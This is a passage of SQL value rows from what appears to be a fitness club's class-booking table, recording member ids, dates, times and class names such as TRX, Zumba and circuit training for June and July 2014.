(1675, 80, 'CTR', '2014-06-11', '19h00', '19h30', 'TRX'),
(1676, 80, 'CTR', '2014-06-11', '18h15', '18h45', 'Cardio'),
(1677, 33, 'CTR', '2014-06-12', '17h30', '18h00', 'Circuit Training'),
(1678, 106, 'CTR', '2014-06-14', '11h00', '11h30', 'TRX'),
(1679, 106, 'CTR', '2014-06-13', '17h30', '18h00', 'TRX'),
(1680, 31, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1681, 31, 'CTR', '2014-06-14', '11h00', '11h30', 'TRX'),
(1756, 118, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1779, 41, 'CTR', '2014-06-16', '18h15', '18h45', 'Circuit Training'),
(1685, 65, 'CTR', '2014-06-12', '19h45', '20h45', 'ZUMBA'),
(1688, 41, 'CTR', '2014-06-17', '18h15', '18h45', 'TRX'),
(1689, 41, 'CTR', '2014-06-19', '19h45', '20h45', 'ZUMBA'),
(1690, 73, 'CTR', '2014-06-11', '17h30', '18h00', 'Renforcement Musculaire'),
(1691, 105, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1693, 80, 'CTR', '2014-06-12', '18h15', '18h45', 'Renforcement musculaire'),
(1694, 69, 'CTR', '2014-06-12', '18h15', '18h45', 'Renforcement musculaire'),
(1695, 53, 'CTR', '2014-06-12', '18h15', '18h45', 'Renforcement musculaire'),
(1696, 22, 'CTR', '2014-06-12', '18h15', '18h45', 'Renforcement musculaire'),
(1697, 80, 'CTR', '2014-06-12', '18h15', '18h45', 'Renforcement musculaire'),
(1700, 103, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1701, 100, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1702, 14, 'CTR', '2014-06-12', '19h00', '19h30', 'Cardio'),
(1704, 48, 'CTR', '2014-06-13', '19h00', '19h30', 'Renforcement Musculaire'),
(1705, 121, 'CTR', '2014-06-13', '19h00', '19h30', 'Renforcement Musculaire'),
(1706, 89, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1707, 48, 'CTR', '2014-06-14', '11h00', '11h30', 'TRX'),
(1709, 112, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1710, 13, 'CTR', '2014-06-14', '11h00', '11h30', 'TRX'),
(1790, 105, 'CTR', '2014-06-19', '19h00', '19h30', 'Cardio'),
(1786, 95, 'CTR', '2014-06-19', '17h30', '18h00', 'Circuit Training'),
(1798, 14, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1715, 34, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1716, 29, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1717, 97, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1803, 29, 'CTR', '2014-06-19', '17h30', '18h00', 'Circuit Training'),
(1838, 98, 'CTR', '2014-06-19', '17h30', '18h00', 'Circuit Training'),
(1720, 13, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1799, 108, 'CTR', '2014-06-21', '11h45', '12h15', 'Circuit Training'),
(1800, 128, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1723, 122, 'CTR', '2014-06-18', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1792, 31, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1791, 48, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1726, 69, 'CTR', '2014-06-17', '18h15', '18h45', 'TRX'),
(1727, 22, 'CTR', '2014-06-18', '18h15', '18h45', 'Cardio'),
(1728, 53, 'CTR', '2014-06-18', '18h15', '18h45', 'Cardio'),
(1729, 54, 'CTR', '2014-06-18', '18h15', '18h45', 'Cardio'),
(1730, 123, 'CTR', '2014-06-18', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1731, 26, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1732, 57, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1733, 129, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1735, 103, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1736, 104, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1737, 126, 'CTR', '2014-06-17', '18h15', '18h45', 'TRX'),
(1738, 126, 'CTR', '2014-06-18', '18h15', '18h45', 'Cardio'),
(1740, 118, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1741, 119, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1742, 118, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1743, 119, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1744, 56, 'CTR', '2014-06-13', '17h30', '18h00', 'TRX'),
(1745, 56, 'CTR', '2014-06-16', '18h15', '18h45', 'Circuit Training'),
(1746, 63, 'CTR', '2014-06-13', '17h30', '18h00', 'TRX'),
(1747, 113, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1748, 26, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1749, 100, 'CTR', '2014-06-16', '18h15', '18h45', 'Circuit Training'),
(1788, 14, 'CTR', '2014-06-17', '18h15', '18h45', 'TRX'),
(1751, 113, 'CTR', '2014-06-18', '19h00', '19h30', 'TRX'),
(1752, 112, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1753, 93, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1763, 88, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1757, 119, 'CTR', '2014-06-13', '18h15', '18h45', 'Circuit Training'),
(1758, 37, 'CTR', '2014-06-14', '11h00', '11h30', 'TRX'),
(1801, 48, 'CTR', '2014-06-21', '11h00', '11h30', 'TRX'),
(1767, 13, 'CTR', '2014-06-26', '17h30', '18h00', 'Circuit Training'),
(1768, 100, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1769, 65, 'CTR', '2014-06-16', '18h15', '18h45', 'Circuit Training'),
(1770, 129, 'CTR', '2014-06-16', '18h15', '18h45', 'Circuit Training'),
(1772, 60, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1773, 62, 'CTR', '2014-06-16', '19h00', '19h30', 'Renforcement Musculaire'),
(1780, 41, 'CTR', '2014-06-18', '17h30', '18h00', 'Renforcement Musculaire'),
(1775, 111, 'CTR', '2014-06-19', '19h45', '20h45', 'ZUMBA'),
(1776, 111, 'CTR', '2014-06-21', '11h00', '11h30', 'TRX'),
(1777, 111, 'CTR', '2014-06-23', '18h15', '18h45', 'Circuit Training'),
(1910, 129, 'CTR', '2014-07-01', '18h15', '18h45', 'TRX'),
(1871, 42, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1914, 103, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1783, 41, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1784, 44, 'CTR', '2014-06-17', '18h15', '18h45', 'TRX'),
(1785, 44, 'CTR', '2014-06-20', '19h00', '19h30', 'Renforcement Musculaire'),
(1787, 127, 'CTR', '2014-06-18', '18h15', '18h45', 'Cardio'),
(1789, 92, 'CTR', '2014-06-17', '18h15', '18h45', 'TRX'),
(1793, 31, 'CTR', '2014-06-21', '11h00', '11h30', 'TRX'),
(1794, 31, 'CTR', '2014-06-20', '19h00', '19h30', 'Renforcement Musculaire'),
(1795, 31, 'CTR', '2014-06-21', '11h45', '12h15', 'Circuit Training'),
(1860, 40, 'CTR', '2014-06-22', '11h00', '11h30', 'Circuit Training'),
(1797, 73, 'CTR', '2014-06-18', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1802, 47, 'CTR', '2014-06-20', '17h30', '18h00', 'TRX'),
(1805, 53, 'CTR', '2014-06-19', '18h15', '18h45', 'Renforcement musculaire'),
(1806, 22, 'CTR', '2014-06-19', '18h15', '18h45', 'Renforcement musculaire'),
(1836, 14, 'CTR', '2014-06-19', '19h00', '19h30', 'Cardio'),
(1808, 129, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1809, 126, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1811, 114, 'CTR', '2014-06-25', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1812, 115, 'CTR', '2014-06-25', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1813, 122, 'CTR', '2014-06-25', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1864, 114, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1865, 115, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1816, 13, 'CTR', '2014-06-25', '17h30', '18h00', 'Renforcement Musculaire'),
(1817, 34, 'CTR', '2014-06-25', '17h30', '18h00', 'Renforcement Musculaire'),
(1818, 97, 'CTR', '2014-06-25', '17h30', '18h00', 'Renforcement Musculaire'),
(1819, 33, 'CTR', '2014-06-25', '17h30', '18h00', 'Renforcement Musculaire'),
(1820, 22, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1821, 53, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1822, 126, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1823, 129, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1824, 26, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1825, 57, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1826, 103, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1827, 104, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1828, 100, 'CTR', '2014-06-19', '19h45', '20h45', 'ZUMBA'),
(1829, 113, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1880, 14, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1831, 118, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1832, 119, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1888, 80, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1834, 80, 'CTR', '2014-06-25', '19h00', '19h30', 'TRX'),
(1835, 32, 'CTR', '2014-06-19', '19h00', '19h30', 'Cardio'),
(1837, 48, 'CTR', '2014-06-20', '19h00', '19h30', 'Renforcement Musculaire'),
(1839, 98, 'CTR', '2014-06-19', '17h30', '18h00', 'Circuit Training'),
(1840, 121, 'CTR', '2014-06-20', '19h00', '19h30', 'Renforcement Musculaire'),
(1841, 100, 'CTR', '2014-06-26', '17h30', '18h00', 'Circuit Training'),
(1915, 32, 'CTR', '2014-06-27', '17h30', '18h00', 'TRX'),
(1843, 100, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1953, 24, 'CTR', '2014-07-01', '17h30', '18h00', 'Cardio'),
(1845, 53, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1877, 108, 'CTR', '2014-06-25', '17h30', '18h00', 'Renforcement Musculaire'),
(1847, 103, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1848, 63, 'CTR', '2014-06-20', '17h30', '18h00', 'TRX'),
(1849, 30, 'CTR', '2014-06-20', '18h15', '18h45', 'Circuit Training'),
(1850, 101, 'CTR', '2014-06-20', '19h00', '19h30', 'Renforcement Musculaire'),
(1851, 119, 'CTR', '2014-06-23', '18h15', '18h45', 'Circuit Training'),
(1852, 103, 'CTR', '2014-06-23', '18h15', '18h45', 'Circuit Training'),
(1856, 48, 'CTR', '2014-06-21', '11h45', '12h15', 'Circuit Training'),
(1857, 118, 'CTR', '2014-06-23', '18h15', '18h45', 'Circuit Training'),
(1858, 32, 'CTR', '2014-06-21', '11h00', '11h30', 'TRX'),
(1859, 30, 'CTR', '2014-06-22', '11h00', '11h30', 'Circuit Training'),
(1861, 77, 'CTR', '2014-06-22', '11h00', '11h30', 'Circuit Training'),
(1862, 41, 'CTR', '2014-06-22', '11h00', '11h30', 'Circuit Training'),
(1863, 41, 'CTR', '2014-06-25', '17h30', '18h00', 'Renforcement Musculaire'),
(1986, 103, 'CTR', '2014-07-04', '18h15', '18h45', 'Circuit Training'),
(2083, 43, 'CTR', '2014-07-11', '17h30', '18h00', 'TRX'),
(1868, 44, 'CTR', '2014-06-23', '18h15', '18h45', 'Circuit Training'),
(1869, 40, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1870, 41, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1872, 13, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1873, 56, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1874, 69, 'CTR', '2014-06-23', '17h30', '18h00', 'TRX'),
(1875, 22, 'CTR', '2014-06-23', '18h15', '18h45', 'Circuit Training'),
(1876, 22, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1878, 48, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1887, 101, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1881, 14, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1882, 128, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1883, 128, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1884, 44, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1885, 65, 'CTR', '2014-06-26', '17h30', '18h00', 'Circuit Training'),
(1886, 13, 'CTR', '2014-06-26', '18h15', '18h45', 'Renforcement musculaire'),
(1889, 80, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1890, 80, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1891, 80, 'CTR', '2014-06-25', '18h15', '18h45', 'Cardio'),
(1892, 40, 'CTR', '2014-06-24', '18h15', '18h45', 'TRX'),
(1926, 93, 'CTR', '2014-06-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1894, 41, 'CTR', '2014-07-01', '18h15', '18h45', 'TRX'),
(1895, 41, 'CTR', '2014-07-02', '17h30', '18h00', 'Renforcement Musculaire'),
(1896, 41, 'CTR', '2014-07-03', '19h45', '20h45', 'ZUMBA'),
(1897, 105, 'CTR', '2014-06-26', '19h00', '19h30', 'Cardio'),
(1899, 14, 'CTR', '2014-06-26', '18h15', '18h45', 'Renforcement musculaire'),
(1900, 48, 'CTR', '2014-06-27', '19h00', '19h30', 'Renforcement Musculaire'),
(1901, 32, 'CTR', '2014-06-26', '19h00', '19h30', 'Cardio'),
(1903, 69, 'CTR', '2014-06-26', '18h15', '18h45', 'Renforcement musculaire'),
(1904, 53, 'CTR', '2014-06-26', '18h15', '18h45', 'Renforcement musculaire'),
(1905, 80, 'CTR', '2014-06-26', '18h15', '18h45', 'Renforcement musculaire'),
(1906, 130, 'CTR', '2014-06-26', '18h15', '18h45', 'Renforcement musculaire'),
(1907, 44, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1908, 101, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1911, 129, 'CTR', '2014-07-02', '18h15', '18h45', 'Cardio'),
(1912, 126, 'CTR', '2014-07-02', '18h15', '18h45', 'Cardio'),
(1913, 47, 'CTR', '2014-06-27', '17h30', '18h00', 'TRX'),
(1916, 100, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1947, 89, 'CTR', '2014-06-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1918, 121, 'CTR', '2014-06-27', '19h00', '19h30', 'Renforcement Musculaire'),
(1919, 33, 'CTR', '2014-07-02', '17h30', '18h00', 'Renforcement Musculaire'),
(1920, 119, 'CTR', '2014-06-30', '18h15', '18h45', 'Circuit Training'),
(1921, 26, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1922, 113, 'CTR', '2014-06-27', '18h15', '18h45', 'Circuit Training'),
(1927, 80, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1928, 34, 'CTR', '2014-07-02', '17h30', '18h00', 'Renforcement Musculaire'),
(1929, 103, 'CTR', '2014-06-30', '18h15', '18h45', 'Circuit Training'),
(1930, 13, 'CTR', '2014-07-01', '17h30', '18h00', 'Cardio'),
(1931, 13, 'CTR', '2014-07-01', '18h15', '18h45', 'TRX'),
(1932, 108, 'CTR', '2014-07-02', '17h30', '18h00', 'Renforcement Musculaire'),
(1933, 108, 'CTR', '2014-06-30', '18h15', '18h45', 'Circuit Training'),
(1934, 104, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1935, 31, 'CTR', '2014-07-01', '18h15', '18h45', 'TRX'),
(1936, 31, 'CTR', '2014-06-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1937, 88, 'CTR', '2014-06-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1938, 87, 'CTR', '2014-06-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1940, 48, 'CTR', '2014-06-30', '19h00', '19h30', 'Renforcement Musculaire'),
(1942, 112, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1945, 41, 'CTR', '2014-06-30', '18h15', '18h45', 'Circuit Training'),
(1944, 113, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1946, 40, 'CTR', '2014-06-30', '18h15', '18h45', 'Circuit Training'),
(1966, 31, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(1949, 42, 'CTR', '2014-07-02', '17h30', '18h00', 'Renforcement Musculaire'),
(1951, 42, 'CTR', '2014-07-03', '19h45', '20h45', 'ZUMBA'),
(1954, 24, 'CTR', '2014-07-03', '17h30', '18h00', 'Circuit Training'),
(1955, 40, 'CTR', '2014-07-01', '17h30', '18h00', 'Cardio'),
(1956, 100, 'CTR', '2014-07-02', '18h15', '18h45', 'Cardio'),
(1957, 100, 'CTR', '2014-07-03', '19h45', '20h45', 'ZUMBA'),
(1958, 100, 'CTR', '2014-07-04', '18h15', '18h45', 'Circuit Training'),
(1959, 73, 'CTR', '2014-07-02', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1960, 29, 'CTR', '2014-07-02', '17h30', '18h00', 'Renforcement Musculaire'),
(1961, 114, 'CTR', '2014-07-02', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1962, 115, 'CTR', '2014-07-02', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1963, 118, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1964, 119, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1965, 103, 'CTR', '2014-07-02', '19h00', '19h30', 'TRX'),
(1971, 41, 'CTR', '2014-07-07', '17h30', '18h00', 'TRX'),
(1968, 32, 'CTR', '2014-07-03', '19h45', '20h45', 'ZUMBA'),
(2168, 29, 'CTR', '2014-07-22', '17h30', '18h00', 'Cardio'),
(1970, 29, 'CTR', '2014-07-03', '17h30', '18h00', 'Circuit Training'),
(2015, 103, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(1973, 41, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(2055, 41, 'CTR', '2014-07-10', '17h30', '18h00', 'Circuit Training'),
(2097, 99, 'CTR', '2014-07-15', '17h30', '18h00', 'Cardio'),
(2093, 40, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2086, 99, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2147, 44, 'CTR', '2014-07-17', '18h15', '18h45', 'Renforcement musculaire'),
(2108, 42, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2165, 33, 'CTR', '2014-07-24', '17h30', '18h00', 'Circuit Training'),
(1982, 97, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1984, 4, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(1985, 4, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2011, 13, 'CTR', '2014-07-09', '18h15', '18h45', 'Cardio'),
(1988, 13, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1993, 108, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1992, 33, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1994, 108, 'CTR', '2014-07-11', '18h15', '18h45', 'Circuit Training'),
(1995, 114, 'CTR', '2014-07-09', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(1996, 80, 'CTR', '2014-07-09', '19h00', '19h30', 'TRX'),
(1997, 19, 'CTR', '2014-07-07', '17h30', '18h00', 'TRX'),
(1998, 19, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(1999, 31, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2000, 31, 'CTR', '2014-07-11', '18h15', '18h45', 'Circuit Training'),
(2001, 88, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(2002, 87, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(2003, 21, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(2004, 20, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(2005, 48, 'CTR', '2014-07-11', '18h15', '18h45', 'Circuit Training'),
(2006, 93, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(2007, 89, 'CTR', '2014-07-07', '19h00', '19h30', 'Renforcement Musculaire'),
(2008, 22, 'CTR', '2014-07-09', '18h15', '18h45', 'Cardio'),
(2009, 34, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(2010, 40, 'CTR', '2014-07-07', '17h30', '18h00', 'TRX'),
(2059, 77, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2013, 41, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2014, 92, 'CTR', '2014-07-09', '18h15', '18h45', 'Cardio'),
(2016, 32, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2017, 118, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2018, 119, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2019, 29, 'CTR', '2014-07-09', '17h30', '18h00', 'Renforcement Musculaire'),
(2021, 36, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2022, 128, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2023, 14, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2024, 24, 'CTR', '2014-07-10', '17h30', '18h00', 'Circuit Training'),
(2025, 24, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2037, 119, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2027, 24, 'CTR', '2014-07-15', '18h15', '18h45', 'TRX'),
(2028, 24, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2029, 24, 'CTR', '2014-07-15', '19h00', '19h30', 'Circuit Training'),
(2030, 24, 'CTR', '2014-07-22', '18h15', '18h45', 'TRX'),
(2164, 14, 'CTR', '2014-07-22', '18h15', '18h45', 'TRX'),
(2032, 24, 'CTR', '2014-07-17', '18h15', '18h45', 'Renforcement musculaire'),
(2033, 24, 'CTR', '2014-07-22', '19h00', '19h30', 'Circuit Training'),
(2034, 24, 'CTR', '2014-07-24', '18h15', '18h45', 'Renforcement musculaire'),
(2035, 13, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2036, 73, 'CTR', '2014-07-08', '18h15', '18h45', 'TRX'),
(2038, 118, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2082, 32, 'CTR', '2014-07-11', '17h30', '18h00', 'TRX'),
(2040, 48, 'CTR', '2014-07-09', '19h45', '20h15', 'Circuit Training'),
(2041, 27, 'CTR', '2014-07-09', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(2042, 53, 'CTR', '2014-07-09', '18h15', '18h45', 'Cardio'),
(2043, 40, 'CTR', '2014-07-09', '18h15', '18h45', 'Cardio'),
(2044, 130, 'CTR', '2014-07-09', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(2045, 131, 'CTR', '2014-07-09', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(2046, 54, 'CTR', '2014-07-09', '18h15', '18h45', 'Cardio'),
(2047, 128, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2048, 128, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2049, 14, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2050, 14, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2051, 19, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2052, 19, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2053, 21, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2054, 20, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2056, 103, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2060, 77, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2058, 41, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2061, 26, 'CTR', '2014-07-09', '19h00', '19h30', 'TRX'),
(2062, 80, 'CTR', '2014-07-09', '19h00', '19h30', 'TRX'),
(2063, 73, 'CTR', '2014-07-09', '16h45', '17h15', 'Séance Spéciale Sportifs'),
(2091, 41, 'CTR', '2014-07-15', '19h00', '19h30', 'Circuit Training'),
(2079, 29, 'CTR', '2014-07-13', '10h30', '11h', 'Cross Training Outdoor 1ère partie'),
(2067, 105, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2068, 32, 'CTR', '2014-07-10', '17h30', '18h00', 'Circuit Training'),
(2081, 73, 'CTR', '2014-07-11', '17h30', '18h00', 'TRX'),
(2099, 31, 'CTR', '2014-07-15', '19h45', '20h15', 'Renforcement Musculaire'),
(2072, 21, 'CTR', '2014-07-15', '19h45', '20h15', 'Renforcement Musculaire'),
(2073, 20, 'CTR', '2014-07-15', '19h45', '20h15', 'Renforcement Musculaire'),
(2074, 29, 'CTR', '2014-07-10', '17h30', '18h00', 'Circuit Training'),
(2075, 48, 'CTR', '2014-07-12', '11h45', '12h15', 'Circuit Training'),
(2078, 53, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2077, 54, 'CTR', '2014-07-10', '18h15', '18h45', 'Renforcement musculaire'),
(2080, 29, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2084, 128, 'CTR', '2014-07-11', '18h15', '18h45', 'Circuit Training'),
(2085, 14, 'CTR', '2014-07-11', '18h15', '18h45', 'Circuit Training'),
(2087, 99, 'CTR', '2014-07-13', '11h', '11h30', 'Cross Training Outdoor 2ème partie'),
(2088, 48, 'CTR', '2014-07-15', '19h45', '20h15', 'Renforcement Musculaire'),
(2089, 128, 'CTR', '2014-07-12', '11h45', '12h15', 'Circuit Training'),
(2090, 14, 'CTR', '2014-07-12', '11h45', '12h15', 'Circuit Training'),
(2092, 40, 'CTR', '2014-07-15', '19h00', '19h30', 'Circuit Training'),
(2110, 53, 'CTR', '2014-07-14', '18h15', '18h45', 'Circuit Training'),
(2130, 31, 'CTR', '2014-07-22', '19h45', '20h15', 'Renforcement Musculaire'),
(2096, 41, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2111, 54, 'CTR', '2014-07-14', '18h15', '18h45', 'Circuit Training'),
(2101, 103, 'CTR', '2014-07-14', '18h15', '18h45', 'Circuit Training'),
(2102, 93, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2103, 44, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2105, 89, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2106, 88, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2107, 87, 'CTR', '2014-07-14', '19h00', '19h30', 'Renforcement Musculaire'),
(2112, 56, 'CTR', '2014-07-14', '18h15', '18h45', 'Circuit Training'),
(2113, 32, 'CTR', '2014-07-14', '18h15', '18h45', 'Circuit Training'),
(2114, 34, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2115, 73, 'CTR', '2014-07-14', '18h15', '18h45', 'Circuit Training'),
(2116, 53, 'CTR', '2014-07-15', '18h15', '18h45', 'TRX'),
(2117, 54, 'CTR', '2014-07-15', '18h15', '18h45', 'TRX'),
(2118, 56, 'CTR', '2014-07-15', '18h15', '18h45', 'TRX'),
(2119, 29, 'CTR', '2014-07-15', '17h30', '18h00', 'Cardio'),
(2149, 80, 'CTR', '2014-07-17', '19h00', '19h30', 'Cardio'),
(2121, 132, 'CTR', '2014-07-17', '19h00', '19h30', 'Cardio'),
(2122, 33, 'CTR', '2014-07-17', '17h30', '18h00', 'Circuit Training'),
(2123, 128, 'CTR', '2014-07-15', '17h30', '18h00', 'Cardio'),
